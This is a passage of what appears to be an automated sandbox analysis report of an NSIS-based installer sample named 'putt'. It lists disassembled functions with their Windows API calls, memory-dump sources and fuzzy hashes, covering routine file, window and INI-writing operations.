                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                                                                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                    • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                    • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                    Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                    Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000010.00000002.2091971353.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091938412.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2091992897.0000000000409000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000040C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000420000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092020310.000000000046B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2092317005.0000000000500000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_400000_putt.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C